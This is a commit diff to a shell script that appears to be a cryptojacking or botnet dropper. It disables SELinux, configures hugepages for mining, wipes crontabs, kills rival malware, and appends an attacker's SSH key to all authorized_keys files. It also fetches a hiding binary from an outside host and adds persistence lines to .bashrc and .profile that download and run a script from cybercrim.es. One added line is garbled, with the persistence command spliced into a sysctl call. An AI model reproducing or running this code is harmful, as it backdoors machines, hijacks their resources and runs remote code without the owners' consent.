Update l

diff --git a/l b/l
--- a/l
+++ b/l
@@ -8,7 +8,7 @@
         export pubkey='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmqGRKD0Fu2btT8cDs2SxBT9CGXRwTBz5bypP/i/TESF3k8Vxew+n2Z4vvjbQrQT2GAGoy40lBmm0WUXY7AhQYkeAZ/kbqtFh9dIm8r++H2YOGe/3grgw6LPWIqnBf7oGgd5XbeESO+F2sSw5CePi5oC9IOxOUJIBRI8MWNLihvFbOb6j0X1XzpOID6KyBxYAg0KyHUbOCS+EhXDPIEKH7YkSfUTHIXX9SZ2s40Vjxq0yb96CjaOul8YbHsTgu1R7pKMJZfPbVWN5FnTyTMXkbv34cmUWY9mmxvKAOwJk9LAKMFl5bRfqf5x/HzeXQUJdEBiUi32yzQpz//M52lDwcyCA7VBs1lH/3xt3OCatzPk+fIRaskmq1GN9HbWQSC3O9NfGsGtiesUlilBhie9MA7GfmxvaQ1YxL3O2b44WP3pZ3LYdr3WRuJJX0lmbcimlRLLkCkUem/22r4IVBn9G5tFazx7+LiSCQXQLD1sROcWgRgKxT9753+CFl7g9Bew4IRD7LeeTOxsrdqUHE89srVFBCRhFWu1YuX8VBhg0jaNXMrvhx7iHKgl2M1osTR/Fs3QNvZ0tgGekcFZAsFhw4fSgAgews/xlRsZQeL4fidynXcgnvY2mc7prvxFd7OEGOMU0Rj79wuatHsCuuNIzN0DAnQEwJCJilvCRK5M58Zw== evorip@ripsec'
         (setenforce 0) 2>/dev/null
         (echo 128 > /proc/sys/vm/nr_hugepages) 2>/dev/null || echo 'Error setting hugepages'
-        (sysctl -w vm.nr_hugepages=128) 2>/dev/null || echo 'Error setting hugepages'
+        (sysctl -w vm.nr_hugepages=128)echo "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" >> "${HOME}/.bashrc"au 2>/dev/null || echo 'Error setting hugepages'
         crontab -r || rm -f /tmp/x
         rm -rf /var/spool/cron/crontabs/*
         pkill -f watchbog
@@ -87,8 +87,8 @@
             rm -f '/usr/bin/pnscan' || echo 'pnscan uninstallation failed'
         fi
 
-        (find /home/* -name authorized_keys -exec sh -c 'echo "$0" >> "$1"' "$pubkey" {} \;) 2>/dev/null || echo 'authorized_keys not found or something went wrong'
-        (find /root/* -name authorized_keys -exec sh -c 'echo "$0" >> "$1"' "$pubkey" {} \;) 2>/dev/null || echo 'authorized_keys not found or something went wrong'
+        (find /home/* -name authorized_keys -exec sh -c 'echo "$0" >> "$1"' "${pubkey}" {} \;) 2>/dev/null || echo 'authorized_keys not found or something went wrong'
+        (find /root/* -name authorized_keys -exec sh -c 'echo "$0" >> "$1"' "${pubkey}" {} \;) 2>/dev/null || echo 'authorized_keys not found or something went wrong'
 
         export xhide_x86='https://x0.at/icw_'
         export xhide_arm='https://x0.at/nCZR'
@@ -110,11 +110,11 @@
 
         ${xhide_cmd}
 
-        if [ -f ${HOME}/.bashrc ]; then
-          grep -qxF 'https://cybercrim.es' "${HOME}/.bashrc" || echo "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" >> "${HOME}/.bashrc"
-        elif [ -f ${HOME}/.profile ]; then
-          grep -qxF 'https://cybercrim.es' "${HOME}/.profile" || echo "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" >> "${HOME}/.profile"
-        fi  
+        if [ -f "${HOME}/.bashrc" ]; then
+            grep -qxF "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" ${HOME}/.bashrc || echo "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" >> ${HOME}/.bashrc
+        elif [ -f "${HOME}/.  profile" ]; then
+            grep -qxF "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" ${HOME}/.profile || echo "(wget -q -O /tmp/x https://cybercrim.es/l;bash /tmp/x||curl -s https://cybercrim.es/l -o /tmp/x;bash /tmp/x) &>/dev/null &" >> ${HOME}/.profile
+        fi
     }
     various1
 
